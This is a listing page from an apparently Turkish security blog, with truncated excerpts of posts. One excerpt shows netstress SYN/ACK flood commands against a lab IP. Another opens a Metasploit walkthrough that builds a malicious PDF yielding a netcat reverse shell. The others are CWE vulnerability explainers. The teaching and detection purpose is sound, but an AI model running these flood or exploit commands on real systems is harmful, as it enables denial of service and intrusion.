|
|
|
|
|
|
|
|
(+) Bu yazı birebir denenmiştir ve başarıyla uygulanmıştır.
Yazı iki başlık altında ilerleyecektir:
1. Netstress ile DOS Nasıl Yapılır
2. tcpdump ile DOS Nasıl Tespit Edilir
1. Netstress ile DOS Nasıl Yapılır
a. SYN Flood Yapma
./netstress.fullrandom -a syn -d 172.16.3.113 -n 10
-a : attack type
-d : destination
-n : number of process
b. ACK Flood Yapma
./netstress.fullrandom -a ack -d 172.16.3.113 -n 10
c. F... [Devamı] |
| Bu yazı 26.02.2026 tarihinde, saat 14:41:43'de yazılmıştır. |
|
| |
|
|
|
|
|
Gereksinimler:
Windows XP SP2 (Dandik)
Eski Kali (kali-linux-1.0.4-amd64.iso)
Adobe Reader v8.1.2
Bu yazıda Kali'den Windows XP sistemine zararlı bir pdf gönderilecektir ve kurban pdf'i açmaya çalıştığında Kali'den netcat tool'u ile gelen bağlantı yakalanacaktır. Böylece hedef sistemin komut satırı komut satırımıza gelecektir.
Öncelikle zararlı bir pdf oluşturalım.
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprin... [Devamı] |
| Bu yazı 26.02.2026 tarihinde, saat 13:47:46'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Client DOM XSS (CWE-79), yani İstemci DOM XSS açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Yüksek
Açıklığın Etkisi:
Oturum çalma, oltalama, arayüz tahrifi
Açıklığın Açıklaması:
Uygulamalar kullanıcı girdilerini, sunucu taraftaki veri tabanlarını veya sunucu taraftaki diğer kaynakları kullanarak güvensiz veri içeren web sayfalar inşa edebilirler. Bu gibi durumlarda güvensiz veri web sayfanın bir parçası olarak sayfanın HTML’i... [Devamı] |
| Bu yazı 26.02.2026 tarihinde, saat 10:26:13'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede Unchecked Input for Loop Condition (CWE-606), yani Döngü Koşulu için Kontrol Edilmemiş Girdi açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Servis dışı kalma, uzaktan komut çalıştırma
Açıklığın Açıklaması:
Uygulamalar tekrarlı işlemleri uygulamak için for ve while gibi döngüler kullanırlar. Bu
döngülerin sınırları dinamik girdiler ile belirleniyorsa (örn; kullanıcı girdisi ile veya
uygulamanın üzerinde ... [Devamı] |
| Bu yazı 26.02.2026 tarihinde, saat 06:13:56'de yazılmıştır. |
|
| |
|
|
|
|
| Bu makalede SSL Verification Bypass (CWE-599) açıklığı, yani SSL Doğrulama Atlatması açıklığı anlatılacaktır.
Açıklık Önem Derecesi:
Orta
Açıklığın Etkisi:
Trafiğin izlenebilmesi
Açıklığın Açıklaması:
Uygulamaların ve api’lerin haberleşmede https protokolü kullanması güvenli kabul edilir. Fakat https protokolü kullanılırken ssl/tls sertifika doğrulaması kontrolünün uygulanmaması güvensiz kabul edilir. Çünkü ssl/tls kullanıldığı ama sertifika ... [Devamı] |
| Bu yazı 24.02.2026 tarihinde, saat 15:27:27'de yazılmıştır. |
|
| |
|
<< < 1 2 3 4 5 6 7 8 9 10 ... > >> |
| |